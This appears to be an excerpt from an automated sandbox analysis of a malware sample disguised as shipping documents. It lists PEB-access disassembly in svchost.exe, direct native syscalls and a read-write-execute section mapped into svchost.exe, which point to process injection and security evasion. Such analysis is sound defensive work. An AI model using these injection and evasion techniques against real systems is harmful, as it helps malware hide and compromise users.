Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]	1_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]	1_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]	1_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]	1_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]	1_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]	1_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]	1_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]	1_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]	1_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]	1_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]	1_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]	1_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]	1_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]	1_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050BCB mov eax, dword ptr fs:[00000030h]	1_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]	1_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]	1_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EBFC mov eax, dword ptr fs:[00000030h]	1_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]	1_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]	1_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]	1_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]	1_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]	1_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]	1_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]	1_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]	1_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]	1_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]	1_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]	1_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]	1_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]	1_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]	1_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]	1_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]	1_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086AA4 mov eax, dword ptr fs:[00000030h]	1_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]	1_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]	1_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]	1_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]	1_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]	1_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]	1_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]	1_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]	1_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]	1_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]	1_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]	1_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]	1_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]	1_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]	1_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov edx, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]	1_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]	1_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]	1_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]	1_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]	1_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]	1_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]	1_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]	1_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]	1_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]	1_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]	1_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]	1_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]	1_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]	1_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]	1_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]	1_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]	1_2_03060854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]	1_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]	1_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE872 mov eax, dword ptr fs:[00000030h]	1_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE872 mov eax, dword ptr fs:[00000030h]	1_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6870 mov eax, dword ptr fs:[00000030h]	1_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6870 mov eax, dword ptr fs:[00000030h]	1_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030887 mov eax, dword ptr fs:[00000030h]	1_2_03030887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC89D mov eax, dword ptr fs:[00000030h]	1_2_030BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E8C0 mov eax, dword ptr fs:[00000030h]	1_2_0305E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA8E4 mov eax, dword ptr fs:[00000030h]	1_2_030FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E6F00 mov eax, dword ptr fs:[00000030h]	1_2_030E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032F12 mov eax, dword ptr fs:[00000030h]	1_2_03032F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306CF1F mov eax, dword ptr fs:[00000030h]	1_2_0306CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305EF28 mov eax, dword ptr fs:[00000030h]	1_2_0305EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4F40 mov eax, dword ptr fs:[00000030h]	1_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4F40 mov eax, dword ptr fs:[00000030h]	1_2_030B4F40

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D3A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00D3A66C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D28189 SetUnhandledExceptionFilter,		0_2_00D28189
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00D281AC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
